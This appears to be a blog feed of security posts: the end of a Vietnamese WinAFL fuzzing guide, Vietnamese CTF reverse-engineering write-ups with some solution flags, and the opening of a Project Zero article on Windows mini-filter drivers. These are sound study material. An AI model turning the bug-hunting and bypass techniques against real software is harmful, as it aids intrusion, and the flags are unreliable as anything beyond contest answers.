Trong quá trình sử dụng Winafl, tôi nhận thấy Winafl chạy ổn định nhất trên Windows 7. Windows 10 nó chạy rất tệ, DynamoRIO gặp 1 số vấn đề với memory trên Windows 10 dẫn đến fuzzer hay bị crash.


Khi fuzzing, tôi khuyên bạn nên bật Page Heap cho harness, để phát hiện tốt hơn các lỗi out-of-bounds và các lỗi uninitialized memory.


Afl-tmin là 1 tool hữu ích giúp bạn minimize corpus, sẽ rất hữu ích với fuzzer trong quá trình mutate corpus. Tuy nhiên tôi thường không sử dụng vì nó quá chậm. Tôi nghĩ tôi sẽ thử sử dụng tool halfempty [8] để thay thế afl-tmin trong tương lai.


Tăng tốc độ chạy: Harness được sử dụng call các api của windows càng ít thì quá trình DynamoRIO instrument càng nhanh. Ở harness tôi viết trên, trong hàm main tôi sử dụng hàm LoadLibraryA để load DLL tôi cần fuzz và target_offset tôi để ở hàm main, nó sẽ giảm tốc độ chạy của fuzzer đi nhiều.

Có nhiều cách giải quyết. Có 1 số cách mà tôi tìm đọc được [9], thay đổi offset bắt đầu instrument cũng khá hay, nhưng khi sử dụng cách này tôi kiểm tra nó khi run ở mode debug với iterator thì fuzzer của tôi chạy không ổn định, tôi không biết lý do tại sao. Ở đây, tôi sử dụng lief [10] để giải quyết vấn đề này. Tôi sẽ load library tôi cần fuzz lên trước khi thực thi hàm main:

 


Và đây là kết quả, sau khi fuzz target này, đã được sửa theo cách của tôi:



Tốc độ có cải thiện, tuy nhiên đây không phải là cách hay nhất vì tốc độ còn phụ thuộc vào target mà bạn fuzz không phải chỉ phụ thuộc vào harness mà bạn xây dựng. Tôi sử dụng nó bởi vì trên Windows còn 1 fuzzer nữa mà sau này tôi ưu tiên sử dụng nó thay vì Winafl, cách load library của tôi trước hàm main phù hợp với kiến trúc của fuzzer đó. Các bài viết sau tôi sẽ đề cập nhiều về fuzzer đó nhiều hơn.

 

Corpus: Nhiều người mới tiếp cận fuzz thường sẽ nghĩ xây dựng harness để fuzz quan trọng và khó nhất. Đối với tôi thì tìm kiếm corpus mới là vấn đề nan giải nhất. Tìm kiếm corpus với coverage cao rất hiếm, và với những corpus này thường mọi người sẽ không chia sẻ vì nó rất có giá trị với fuzzing.


Khi tìm được 1 lượng lớn corpus bạn nên dùng winafl-cmin để giảm số lượng testcase xuống. Sẽ có những testcase mà coverage của nó trùng lặp hoặc đã bao hàm trong testcase khác.

 

Conclusion


Đây là target đầu tiên tôi sử dụng để học fuzzing. Khi các bug của tôi được submit và lấy CVE có 1 số người nói rằng tôi farm và là CVE cỏ. Tôi cũng không tranh luận gì với những người đó, tôi chỉ quan tâm việc tôi làm thì tôi sẽ học được những gì từ đó thôi. Tiếp nối loạt bài về fuzzing này, tôi sẽ chia sẻ cách mà tôi tiếp cận và fuzz ra những bug của VMWare, Microsoft,… dựa trên những thứ tôi đã nói trong bài viết này.



[3] https://www.xnview.com/en/

[4] https://www.apriorit.com/dev-blog/644-reverse-vulnerabilities-software-no-code-dynamic-fuzzing

[5] https://symeonp.github.io/2017/09/17/fuzzing-winafl.html

[6] https://github.com/DynamoRIO/dynamorio

[7] https://github.com/gaasedelen/lighthouse

[8] https://github.com/googleprojectzero/halfempty

[9] https://github.com/googleprojectzero/winafl/issues/4

[10] https://github.com/lief-project/LIEF

RedVelvet - 75 pts

By: linhlhq
6 February 2018 at 09:06
Bài này k có gì đặc biệt, nhập flag rồi check từng kí tự:


Các function từ fun1 -> fun15 sẽ check các kí tự của flag. Đoạn antidebug quá rõ nên bypass ezzz.
Khi check hết các function trên thì có nhiều flag, nói là nhiều nhưng chỉ có vài cái thôi, lôi chày cối sub thoải mái chả vấn đề gì. Còn không thì đi tiếp thêm 1 tí có đoạn check hash SHA256. Mình thì mình sẽ sub luôn =)).

Code solution mình code chày cối :( lúc làm mình thấy có hash nên sợ có nhiều đáp án dùng z3 sợ sau này phải tìm thêm kết quả.

easy_serial - 350pts

By: linhlhq
6 February 2018 at 09:04
Đây là 1 challenge theo bản thân mình nghĩ là không văn minh. Hoặc ý đồ của người ra là bắt mình dùng tool để decompiler.
Ban đầu phấn khởi load lên IDA chạy. Dính ngay trick Virtual alarm có vẻ để đọc code mà bypass cái trick này khá rắc rối (không tính đến mấy cái trick tương tự mà chỉ gọi hàm alarm thì quá dễ). Mình đọc code để tìm hàm main của nó thì thấy cái tên khá là lạ “Main_main_infor”,… Search google thì biết được nó được code bằng Haskell. Check lại thì thấy ngay GHC.


Tiếp tục google xem có tool decompiler nó không thì mình tìm được 1 tool link mình để ở đây. Dùng khá dễ. Ngoài ra mình còn tìm được 1 link nó manually decompiler có thể tham khảo thêm cách họ làm. Sau khi decompiler thì nó ra 1 đống thế này đây chắc là opcode tượng trưng vì mình có search tìm cấu trúc của haskell thì nó khác cái đống này.

Cop sang notepad ngồi xem thấy có mấy đoạn text quen thuộc là khả thi rồi =)).

Đên đây thì bài này hết thú vị rồi. Vì nó rõ rành rành là so sánh các kí tự kia rồi. Và đây là script của bài này

Boom - 223pts

By: linhlhq
6 February 2018 at 08:59
Bài này cũng được build đặc biệt multi platform. Nếu debug không quen nhay hết vào các hàm thì sẽ rất mất thời gian.
Ban tổ chức cho bài này quá dài. 1 bài VM mình làm chắc cũng chỉ dài đến tầm này.
Ở trong bài có rất nhiều nhánh. Input nhập vào thì cũng vậy. Mình mới chỉ làm 1 nửa thì dừng vì check server thì thấy đóng mất rồi. Khá tiếc không biết có mở lại hay k.

Vì nó dài nên mình định không viết bài này. Rất ngại đi vào chi tiết. Ở đây mình chỉ làm sơ bộ thì các phần mình đã giải rồi.
Nói qua 1 chút về mục đích của chương trình. Nó sẽ bắt mình nhập 1 chuỗi và kiểm tra nếu đúng nó sẽ đọc 1 file từ /tmp/files/?, và cứ thế đi sâu xuống, nhập đúng càng nhiều thì càng đọc được nhiều file, các file này được đánh số từ 1 -> 13.Chính vì mình chưa làm hết được các nhánh và server tắt rồi nên chưa chắc là file đó sẽ có gì. Có thể là các kí tự của FLAG

1. Đầu tiên khi khởi chạy chương trình, nó sẽ yêu cầu mình nhập 1 chuỗi.

Chuỗi mình nhập sẽ có 3 trường hợp:
Nếu nhập chuỗi “Know what? It's a new day~” thì sang nhánh 1 (mình đặt tên cho dễ viết thôi nhé)
Nếu nhập : ” It's cold outside..” sẽ sang nhánh 2. -> open file /tmp/files/2
Nếu nhâp: “We need little break!” sẽ sang nhánh 3 -> open file /tmp/files/3
 Mình sang nhánh 1 => mở và đọc file /tmp/files/1

2. Tiếp theo chương trình sẽ đọc vào 7 số. 7 số này sẽ được chuyển đổi qua 1 chuỗi kí tự và so sánh nếu đúng thì sẽ tiếp tục đọc thêm 1 file. Điều đặc biệt là có đến 3 chuỗi được đem ra so sánh =)).

key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4
key2 = 'w33kend' => [49 15 15 31 1 23 13] => /tmp/files/5
key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6
Cả 3 dãy số trên đều đúng tuy nhiên mỗi dãy mở ra 1 file khác nhau. Rối rắm vc

3. Tiếp theo chương trình sẽ yêu cầu nhập 1 số và sẽ check số đó thong qua hàm main::fun12

If(main::fun12(0,number)==0x6b) => true
Cái điều kiện đó có rất nhiều số thỏa mãn nhé.Sau khi nhập đúng nó tiếp tục mở 1 file /tmp/files/13

4. Sau đó nó yêu cầu nhập tiếp 4 số. Đến đây mình đọc code không hiểu cái số đó nó làm gì và khá nản. Nhưng ai ngờ lỗi như nào chương trình này nó in cho mình xem hết.

Mình thử 1 vài input nữa và nhận ra số chỉ từ 1->9. Vậy thì tại sao không brute force =)).
Mình ngồi burte ra 1 số nghiệm thỏa mãn. Ex: 1 3 5 8
Và khi nhập đúng nó tiếp tục mở 1 file /tmp/files/8

5. Tiếp đến là 1 chuỗi để biến đổi và so sánh với “H_vocGfsg4p_xicwcrwexg4r”. Các thuật toán biến đổi mình sẽ có trong code solution.
Khi nhập đúng nó sẽ mở tiếp file /tmp/files/11
Sauk hi xong chuỗi này mình nhận ra rằng nó quay lại cái chỗ nhập 7 số. Và mình đã nhập tiếp các trường hợp còn lại ở trên.
- Đối với trường hợp key1 = "carame1" => [3 14 7 14 60 1 26] => /tmp/files/4 thì nó cư vòng vo quay đi quay lại các bước ở trên
- Duy chỉ với TH: key3 = 'pand0ra' => [57 14 23 13 50 7 14] => /tmp/files/6 thì sau đó nó yêu cầu mình nhập 27 số và kiểm tra. Và nó mở thêm 1 file /tmp/files/10
Đến đây mình đã check rất kĩ mà k thấy điều kiện thoát nó cứ vòng vo nhập số lại nhập chuỗi.
Nếu các file kia chứa các kí tự của flag thì chắc mình sẽ khởi chạy 3 lần, để lấy ra ki tự =)).
Thôi chắc đến đây thôi. Nếu server bật lại mình sẽ thử nốt =)). Code mình giải các problem ở đây.

Review nhẹ các bài Reverse ở Codegate

By: linhlhq
6 February 2018 at 08:51
1. RedVelvet – 75 pts
    Đây là 1 bài đơn giản, đơn thuần check các kí tự của flag.
2. Welcome to droid - 125pts
    Bài này mình làm khá tù, mình xem write-up của họ thì patch lại entry point, trong khi mình đi đọc opcode dalvik rồi patch cái hàm random =)). Khá óc nên mình k viết bài này.
3. Boom - 223pts
   Bài này mình làm gần xong thì phát hiện server bị tắt nên dừng luôn. Về cơ bản nó khá là dài và được build củ chuối nữa.
4. easy_serial - 350pts
    Bài này cũng là 1 dạng củ chuối như bài boom. Nhưng nó còn củ chuối hơn nữa là có tool decompiler.
5. 6051 - 880pts
    Đây là challenge mà mình thấy hay nhất mà mình đã làm được trong đống này. Mạng nặng tính thuật toán.
6. CPU - 971pts
    1 Dạng VM có lẽ thế, vì mới xem qua code thì hình giống bài ở mates-round1, cũng bắt nhập opcode để thực thi. Đây cũng là 1 bài connect server vì server tắt nên mình chưa động chi đến nó =)). Ngụy biện =)) có bật chắc cũng khó mà chịch được nó.

Serialme

By: linhlhq
26 December 2017 at 15:32
Đây là 1 dạng bài vm engine. Mình có đọc nhiều writeup của nhiều pro mà họ làm mình đọc không hiểu gì :v. Toàn giải văn minh thôi à.
Mong là sau này mình hiểu rõ hơn cái này để làm. Còn bây giờ mình giải được bài này là nhờ vào cái này
Mình có đọc và tìm hiểu qua về cơ chế của vm_engine.Cái cơ chế của nó tập trung ở vòng lặp “vm_loop”.
Nói qua về cơ chế của bài này. Đề yêu cầu mình nhập 10 số lần lượt, đúng đủ 10 số thì sẽ bung flag ra. Nói đơn giản vậy chứ cái vm_engine kia làm mình rối rắm trong khâu check các số đó lắm.
Cụ thể ở bài này cái vòng lặp vm nó nhìn tổng quát sẽ như thế này đây:

Ở cái vòng lặp này có đến 20 case, mỗi case trong đó cơ bản nó chỉ thực hiện 1 lệnh nào đó ví dụ như add, xor, mov,… Nên mình làm là mình trace trâu bò :v.

case 12: là case minh nhập vào số và xử lý ở đây. Sau khi cái đống code kia xử lý số nhập vào thì giá trị đó được lưu ở eax. Thực ra nếu đi sâu vào thì rắc rối phết. Vì tác giả chuyển đổi kiểu input thành input từ file đâm ra input số vào lại là chuỗi xong chuyển qua chuyển lại mới ra cái giá trị được lưu trong eax kia.
Đến đây thì từng số sẽ được đi qua các case để thực hiện các phép tính toán. Và cuối mỗi lần thực hiện đó nó lại dừng ở case 8 để so sánh. Ta cần làm nó thỏa mãn cái điều kiện ở đây thì mới có thể nhập tiếp được.

Đến đây thì ezz trâu bò ra flag rồi :v.

Debugme

By: linhlhq
26 December 2017 at 14:57
Bài này mình sẽ giải thích sơ qua. Khi mình nhập flag vào, flag sẽ được mang đi mã hóa (AES 256). Sau đó sẽ được xor với 1 chuỗi :v. Đó tất cả đấy =)).
Về điều kiện từng cái như sau: độ dài flag = 9.

Sau đó chương trình sẽ tạo ra 1 thread. Trong thread này sẽ chạy 16 vòng lặp mã hóa. Nhưng đây là troll mình :v. Chạy 16 vòng y hệt nhau không phải gối lên nhau. Chung quy lại cái thread kia chỉ là mã hóa AES flag thôi.

- Đây là source code mã hóa AES. Cái thread này nó đánh lừa mình và làm mình mất khá nhiều thời gian. Như mình nói ở trên đây thực ra chỉ là mã hóa cái flag 1 lần chứ không phải 16 lần. Nhưng khi mình check kết quả sau khi chuỗi mình nhập chạy qua cái thread này nó lại trả giá trị khác với mã hóa 1 lần. Làm mình phân vân loay hoay ^^.
- Sau 1 hồi mình mới để ý cái hàm WaitForMultipleObjectsEx ở ngay dưới Thread.Mình sẽ đặt break point ở trước hàm sleep kia Vì mình kiểm tra gia trị bị thay đổi sau khi chạy qua hàm Sleep

- Để bắt được cái khoảnh khắc đó. Mình đặt 1 hard break point ở địa chỉ lưu trữ kết quả của chuỗi (byte_1D4CA0) và chạy bình thường. Để khi cái hàm làm thay đổi giá trị mã hóa thực hiện thì chương trình của mình sẽ dừng ở đó.
- Và đây là hàm thay đổi giá trị ciphertext, đơn giản là nó xor với giá trị ở xmmword_1A9EF0

- Đến đây là xong rồi ciphertext sau khi xor sẽ được mang đi so sánh với giá trị ở đây

- Tất cả các bước check giá trị ciphertext và plaintext mình thực hiện ở trên trang web: http://aes.online-domain-tools.com/

Unlockme

By: linhlhq
26 December 2017 at 14:51
Bài này là 1 dạng serial, mình sẽ nhập name và key vào. Sau khi biến đổi name và key nó phù hợp theo đúng thuật toán của bài là sẽ có flag thôi :v.
Bài này code khá dài và lằng nhằng. Mình nói qua thuật toán bài này như sau:
- Về phần name, sau khi được nhập vào lần lượt các kí tự sẽ được biến đổi theo đoạn mã giả sau:

Sau khi biến đổi thì giá trị của biến base sẽ được dùng để check key mình nhập
- Về key thì định dạng của key sẽ là xx-xx-xx-xx => leng = 11. Nếu để ý thì sẽ có đoạn check độ dài của key:

Tiếp theo các giá trị ở xx kia sẽ được chuyển trực tiếp thành số. Ví dụ 12-13-3f-4a thì sẽ thành 4 số là 12,13,3f,4a
Các con số này sẽ được mang đi add với từng kí tự trong cái base ở trên kia theo thứ tự ngươc nhau và điều kiện ràng buộc như sau:
base[0] + số thứ 4 == base[1] + số thứ 3 == base[2] + số thứ 2 == base[3] + số thứ 1
(cái thứ tự là mình nói để dễ hình dung thôi nhá còn source code của tác giả có thể văn minh hơn của mình =)))
Khi mình làm đến đây rồi mình cứ nghĩ là ok, ai ngờ ban tổ chức troll lại còn fake flag :v. Sub sai sấp mặt

Tác giả ra đề còn anti debug đoạn in ra flag với hình như bắt mình nhập name phải dài hơn 1 kí tự đoạn này mình sửa luôn thanh ghi để bypass :v
WhiteHat{2f2a1ebcc9f4b69502343e04bc2ae7e185e4c01a}

Writeup Pyc

By: linhlhq
26 December 2017 at 14:47
Sau khi nhận được file mình giải nén thì được file connect.pyc. Cái này dùng tool decompiler để lấy source thôi. Và đây là source nguồn của nó.

Đây là 1 cách thực thi code mà python hỗ trợ, cái đống data kia là 1 dạng binary sau khi được build từ source và có thể thực thi bằng cách marshal.loads như trên.
Đến đây mình có google để tìm hiểu về cái này và thấy đâu đâu cũng chỉ mình cách dùng disassemble của python để biểu diễn cái source kia sang 1 dạng ngôn ngữ tựa asm mà mình có thể hiểu.
Thấy thế mình nghĩ ezz là dis rồi xem cái đó nhưng mà không đơn giản tí nào :v

Phải mất 1 hồi để hiểu được cái cấu trúc của cái đống trong hình =)). Sau đó thì mình code lại cái nội dung mà đoạn mình vừa disassem ra ở trên để cho dễ theo dõi. Link file mình cover lại code

Về cách hoạt động để check flag của nó sau khi mình code lại bằng python cũng không có gì đặc biệt. Flag được tách ra thành 6 cụm mỗi cụm 4 kí tự lần lượt nằm trên các dòng và được lưu trong file có tên là flag.txt. Nó sẽ đọc flag ở trong file và kiểm tra.
Có 3 hàm kiểm tra chính là “xor” ,”check_flag” và “check_str” các nội dung trong file flag.txt sẽ được mang đi kiểm tra qua các hàm này.
Bài này không phải khó ở đoạn getflag mà chắc ý của ban tổ chức là cái đống bycode python mình cần disassembly để hiểu ở trên kia thôi
Mình có viết 1 đoạn Sript để lật ngược lại lấy được các cụm flag cũng dạng là brute thôi :v.
Có nhiều hơn 1 flag với cái Script của mình vì mình chỉ dùng có 2 điều kiện để check flag nhưng khi chạy thì nhìn được ngay đâu là flag đúng thôi :v
{Ch4ll3ngE_V3ry_FUN_R1gHt}

Writeup re250 (Picaso)

By: linhlhq
14 December 2017 at 14:00
Loay hoay làm bài da-vinci (re150) 1 hồi mãi không hiểu ý của tác giả là gì mặc dù thuật toán bài đó rất rõ ràng.
Quay sang bài picaso(re250) :v không phải chọn nó vì tên mà xem số người làm được thôi.
Ban đầu nhìn dung lượng file này thấy ngờ ngợ (~10mb). Load lên ida mới giật mình thấy toàn là lệnh mov :v. Và đây là dạng mình làm rồi (đề thi chọn đội tuyển của UET).
Đây là 1 dạng obfuscate code với lệnh mov, cái này mà để nguyên debug thì chỉ có sấp mặt
  • Nếu cứ cố chấp trace thì có lẽ sẽ nhìn thấy cái chữ màu vàng trên hình kia khá khá khá nhiều lần :v.
  • Đối với dạng này đầu tiên cần phải deobfuscate được code. Cái này thì mình không biết nhưng thằng khác nó lại biết, còn viết cả code mình chỉ lấy tool nó viết về xài thôi
  • Sau khi demovobfuscate được thì code nhìn cũng không có gì khác biệt vẫn rất nhiều lệnh mov nhưng quan trọng ở chỗ là code bây giờ đã xuất hiện các lệnh JMP trước đó bị làm rối.
  • Đến đây thì giải bài này dễ hơn nhiều rồi, vì là đã làm rối code nên cái check flag của bài này rất đơn giản.
  • Cách mình lật ngược cái đoạn code check flag như thế này:
    • Mình tìm đoạn text in ra flag -> đặt nhãn mới cho đoạn code này
    • Tìm tiếp cái đoạn “No! Try another key!” kìa -> đặt tiếp cái nhãn đến đó
    • Và bắt đầu lật ngược code từ chỗ in flag lên Có đến 9 lệnh JMP đến cái nhãn No_flag => đoán sơ sơ ban đầu chắc 1 lần check leng, 8 lần check flag.
    • Nếu lật ngược lên từ đoạn code in flag thì có thể nhận ra dễ dàng là nó sẽ kiểm tra flag sau đó nếu thỏa mãn nó sẽ nhảy sang đoạn code check flag tiếp nếu k nó sẽ Jmp No_flag
    • Cứ như vậy cho đến đầu code (làm thế này rất nhanh mà không phải mò mẫm khi cứ thế trâu bò debug luôn) thì thấy đoạn check leng của flag:
  • Khi xong xuôi thì có thể debug luôn :v. tìm flag nhưng code vẫn còn rối với nhiều mov lắm, trace ra cờ chắc cũng mất thời gian. Nhưng trong lúc mình truy ngược lên mình có để ý ở trong các hàm check flag là code trong đó phần lớn là giống nhau, giống đoạn đầu code (đoạn jmp đến) cũng như đoạn cuối code (đoạn jmp đi) cấu trúc là như nhau vậy thì giữa code :v…
mov R3, edx
   mov R2, value
mov eax, R3
mov edx, R2
    • Cái mẩu code này là chìa khóa giải bài này cái giá trị value kia sẽ thay đổi qua từng lần JMP và tất cả các giá trị đó mình nhặt ra đây:
    • [8,0x71,0x69,0x65,0x65,0x76,0x74,0x69,0x74] => [qieevtit]
  • Cái số 8 kia có thể là độ dài của flag
  • Nhập thử thì đây không phải flag, bị hoán đổi vị trí rồi. Nhìn là nghĩ ngay đên brute chứ ngại debug cái đống code kia lắm. Do thời gian này đang học dùng mấy cái tool kiểu như z3, angr (mình gà lắm chả biết mấy cái tool này ,mấy bài mà giải được bằng nó thì toàn lôi notepad++ ra nháp).
  • Để mò nốt cái flag kia là gì mình dùng pin tool cái này đọc trong blog của sư phụ mình lâu rồi cái này mình thấy rất hay. Cái tool này đơn thuần là đếm số lệnh nó thực hiện khi chạy. Vậy thì mình sẽ thử vị trí của cái đống kí tự kia nếu số lượng lệnh tang lên theo các lần thử thì vị trí đó đúng nếu k thì sai :v. Và đây là code slove mình viết bằng python chạy khá ổn nhưng mà chậm không biết làm thế nào cho nhanh.
  • Mình chỉ thắc mắc là chỗ check leng của bài này. Khi xài tool kiểm tra lại leng của flag thì thấy lạ là đối với flag dài 7 kí tự đổ xuống thì số lệnh sẽ tăng lên dần dần, nhưng đến khi 8 kí tự trở lên thì số lệnh giảm 1 xíu so với leng = 7 và nó k thay đổi từ đó => mình vẫn mập mờ với cái đoạn check leng này. Nếu mà thế kia thì đoạn code check leng của tác giả khéo là chỉ kiểm tra nó >= 8, hoặc là gì gì đó mà mình không biết.
Và đây là kết quả mình thử lấy flag với pin tool:

=)) tieqviet
Và lấy flag di sub wôi:

Hunting for Bugs in Windows Mini-Filter Drivers

By: Ryan
14 January 2021 at 17:04

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

 The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues being fixed I thought would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

This is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making a IO request. When handling responses the altitudes processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

bindflt                                 1       409800         0

WdFilter                               17       328010         0

storqosflt                              1       244000         0

wcifs                                   0       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                    14        40700         0

FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances which indicates the number of volumes that’s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus

------------- ------------  ----------------------  -----  --------

C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {

    { IRP_MJ_CREATE,

      0,

      PreCreateOperation,

      PostCreateOperation },

    { IRP_MJ_OPERATION_END }

};

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS

(*PFLT_PRE_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID *CompletionContext

    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

Name

Value

Description

FLT_PREOP_SUCCESS_WITH_CALLBACK

0

The callback was successful. Pass on the IO request and get a post-operation callback after completion.

FLT_PREOP_SUCCESS_NO_CALLBACK

1

The callback was successful. Pass on the IO request. No callback required.

FLT_PREOP_PENDING

2

Mark the IO operation as pending.

FLT_PREOP_DISALLOW_FASTIO

3

If handling a Fast IO operation, fail it to force the operation as a normal IO Request.

FLT_PREOP_COMPLETE

4

The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.

FLT_PREOP_SYNCHRONIZE

5

Synchronize the post-operation callback in the same thread.

FLT_PREOP_DISALLOW_FSFILTER_IO

6

Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS

(*PFLT_POST_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID CompletionContext,

    FLT_POST_OPERATION_FLAGS Flags

);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

Name

Value

Description

FLT_POSTOP_FINISHED_PROCESSING

0

The callback was successful. No further processing required.

FLT_POSTOP_MORE_PROCESSING_REQUIRED

1

Halts completion of the IO request. The operation will be pending until the filter driver completes it.

FLT_POSTOP_DISALLOW_FSFILTER_IO

2

Disallow FastIO file creation.

Handling IO Requests

